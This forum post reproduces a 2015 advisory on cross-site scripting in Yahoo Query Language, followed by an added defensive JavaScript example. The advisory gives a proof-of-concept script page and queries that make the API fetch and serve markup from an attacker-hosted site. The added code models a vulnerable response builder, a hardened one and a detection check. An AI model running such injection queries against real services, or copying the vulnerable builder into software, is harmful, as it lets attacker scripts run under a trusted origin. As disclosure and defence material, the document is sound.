Aerosol
Posted March 10, 2015

*************************************************************************************
Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability
Exploit Author: Peyman D. aka C4T
Vendor Homepage: http://query.yahooapis.com/
Google Dork: none
Date: 2015-03-08
Tested on: Windows 7 / Mozilla Firefox
*************************************************************************************

Exploit Code:
******************
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<span>Discovered by Peyman D.</span><span>aka C4T</span>
<script>alert('Successfully Exploited');</script>
</body>
</html>

*************************************************************************************
Location & Vulnerable query:
******************
http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html'

*************************************************************************************
Proof:
******************
Executable script tag in API's own page:
Malicious source: http://hatrhyme.com/alert.html
Exploit query:
http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html'
-------------------------------------------------------
Injecting HTML tags in API's own page:
Malicious source: http://hatrhyme.com/expl.html
Exploit query:
http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html'
-------------------------------------------------------

*************************************************************************************
Explanation and the cause of this vulnerability:
http://hatrhyme.com/XSSInYQL.pdf
*************************************************************************************
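The following is an added example and is not part of the advisory or of Yahoo's code. It models the pattern the Proof section describes: an API fetches an attacker-controlled page through its `html` table and returns the selected nodes inside its own response, so whatever markup the attacker hosted ends up in the API's origin. The vulnerable builder splices the fetched nodes into the XML response as raw markup; my reading (an assumption, not something the advisory states) is that the `xmlns="http://www.w3.org/1999/xhtml"` declaration on the exploit page is what lets Firefox treat those nodes as renderable XHTML, which is why the advisory's PoC carries it. The hardened builder carries the same data as escaped text and sets `X-Content-Type-Options: nosniff`. `buildYqlUrl`, `buildVulnerableResponse`, `buildSafeResponse` and `containsRenderableMarkup` are hypothetical helper names; the fetched HTML is the advisory's own exploit page, embedded here as constructed input.

```javascript
'use strict';

// Constructed input: the advisory's exploit page, as the API would fetch it
// from the attacker-controlled URL.
const FETCHED_HTML =
  '<html xmlns="http://www.w3.org/1999/xhtml"><body>' +
  '<span>Discovered by Peyman D.</span><span>aka C4T</span>' +
  "<script>alert('Successfully Exploited');</script></body></html>";

// The query shown in the advisory, URL-encoded the way a browser or client
// would send it. Only the attacker-controlled URL varies.
function buildYqlUrl(apiBase, attackerUrl) {
  const q = "select * from html where url='" + attackerUrl + "' and xpath='html'";
  return apiBase + '/v1/public/yql?q=' + encodeURIComponent(q);
}

// Hypothetical vulnerable builder: the selected nodes become child elements of
// the response, namespace declaration included, so a browser opening the API
// URL directly may render them and execute the script in the API's origin.
function buildVulnerableResponse(fetchedHtml) {
  return {
    headers: { 'Content-Type': 'application/xml; charset=utf-8' },
    body: '<?xml version="1.0" encoding="UTF-8"?>' +
          '<query><results>' + fetchedHtml + '</results></query>',
  };
}

// Escape the five XML-significant characters so markup becomes inert text.
function escapeXml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;',
  })[c]);
}

// Inverse of escapeXml; a single left-to-right pass, so "&amp;lt;" decodes
// once to "&lt;" and is not re-decoded.
function unescapeXml(s) {
  return s.replace(/&(amp|lt|gt|quot|apos);/g, (m, name) => ({
    amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
  })[name]);
}

// Hardened builder: the fetched markup is text content, not elements, and the
// nosniff header keeps the browser from reinterpreting the declared type.
function buildSafeResponse(fetchedHtml) {
  return {
    headers: {
      'Content-Type': 'application/xml; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: '<?xml version="1.0" encoding="UTF-8"?>' +
          '<query><results>' + escapeXml(fetchedHtml) + '</results></query>',
  };
}

// Response check: is there an unescaped element a browser could treat as
// XHTML (an element carrying the XHTML namespace, or a script start tag)?
const XHTML_NS = 'http://www.w3.org/1999/xhtml';
function containsRenderableMarkup(body) {
  const nsElement = new RegExp(
    '<[A-Za-z][^>]*\\sxmlns=["\']' + XHTML_NS.replace(/[./]/g, '\\$&') + '["\']'
  );
  return nsElement.test(body) || /<script[\s>]/i.test(body);
}

// Demo when run directly: the same fetched page, handled both ways.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildYqlUrl('http://query.yahooapis.com', 'http://hatrhyme.com/alert.html'));
  console.log('vulnerable renderable:', containsRenderableMarkup(buildVulnerableResponse(FETCHED_HTML).body));
  console.log('hardened renderable:  ', containsRenderableMarkup(buildSafeResponse(FETCHED_HTML).body));
}
```

The check is deliberately coarse: it flags the two signals the advisory's PoC relies on and is meant as a regression test for the response builder, not as a general XSS filter. The real fix is structural: third-party markup returned by an API must never be emitted as elements of the API's own document.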